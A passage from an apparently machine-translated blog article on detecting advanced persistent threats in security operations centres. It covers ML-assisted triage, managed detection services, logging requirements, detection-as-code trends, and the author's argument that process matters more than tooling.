But AI-scoping does not replace analytics. The organizational context is that the ML is not able to take into account. PowerShell-script at 2:00 am on the host of IT-administrator - normal work. The same script on the host of a marketer is a red flag. This context is known only to a person working with a specific infrastructure.
Detailed analysis of ML-approaches in SOC with real metrics: Machine Learning in Cybersecurity: How ML-scoring Reduces SOC Triplet
Practical stack: what to expand depending on the maturity of SOC
The choice of tools depends on the budget, the size of the team and the current level of maturity. There is no universal stack - there is a decision tree.
Stack by command size
When to buy MDR instead of hiring
Managed Detection and Response (MDR) - outsourcing and response - is economically justified if the cost of hiring and retaining L2-L3 analysts exceeds the value of the MDR service. For a team of 1-3 people, the MDR provider (UnderDefense, CrowdStrike OverWatch, Arctic Wolf) closes night shifts and gives access to expertise that cannot be hired on the market.
MDR Limit: The provider does not know your infrastructure like the internal command. The first 30 days is the onboarding period when the number of false escalations will be high. You have to be prepared for that.
Data sources for APT detection: what to collect and why
Detecting targeted attacks does not start with tools, but with data sources. If SIEM does not receive the right lairs, no correlation rules will not help.
Key Logging Required by OWASP A09:2021 (Security Logging and Monitoring Failures): without logging and monitoring, compromise cannot be detected. Audited events are obliged to be logged, warnings are to be generated, and logs are analyzed. Violation of any of these conditions creates a blind zone for APT.
Where the APT detection is going in 2026-2027
Three trends will determine APT detection in the coming year.
The AI-native detection will replace AI-assisted. The difference is fundamental: AI-assisted - ML complements the existing rules. AI-native - ML is the main engine of detection, and the rules are used for validation. Next-generation platforms will build attack storylines automatically, correlated endpoint, network, and identity telemetry through GraphML without manual setting the rules.
Detection-as-Code will be the standard. Sigma-rules, versioned in Git, tested through CI / CD, deposited on any SIEM - this approach is already used by mature SOC teams. In 2026-2027, it will become a basic requirement. The Sigma + YARA + Osquery bundle gives a portable detection stack independent of the vendor.
Identity-centric security will replace perimeter-centric. With 79% of attacks without malware and 71% growth in credential-based attacks, the detection focus shifts from “what is running on the host” to “who does what and why it’s abnormal.” UEBA, behavioral analysis, continuous authentication - not options, but mandatory components of the SOC-sewage.
Most SOC teams I have watched in recent years make the same mistake: they buy tools, not build a process. The organization puts CrowdStrike on endpoints, connects Splunk, deploys NDR - and believes that it is protected from APT. After six months, it turns out that the EDR agent is worth 80% hosts (the remaining 20% is Linux servers that were “forgotten” to roll), the SIEM-rule is default, and no one understands NDR-allerators, because the L1 analyst does not understand what it means “anomalous beacon pattern”.
Tools are multipliers. Multiply them by zero process - get zero detection. I saw an SOC of two people with Elastic and well-written Sigma rules that caught the lateral movement in 15 minutes. And I saw a SOC of twenty people with an enterprise-glass for millions of dollars, where Cobatt Strike beacon lived online for a month because the alter that drowned in the stream of four thousand daily false positive.
In the next two years, there will be a strict polarization. The teams that invest in Detection Engineering – writing, testing and iterating the definition rules as code – will catch APT in the early stages of kill chain. Teams that continue to rely on vendor default and marketing promises of “AI-powered detection” will learn about compromise from the news. The AI-native SOC platform market is growing, but the technology will not replace an engineer who understands why a specific PowerShell script on a particular host at a specific time is a red flag, not standard automation. The choice between these two ways each team makes today - not when attacking is already inside.
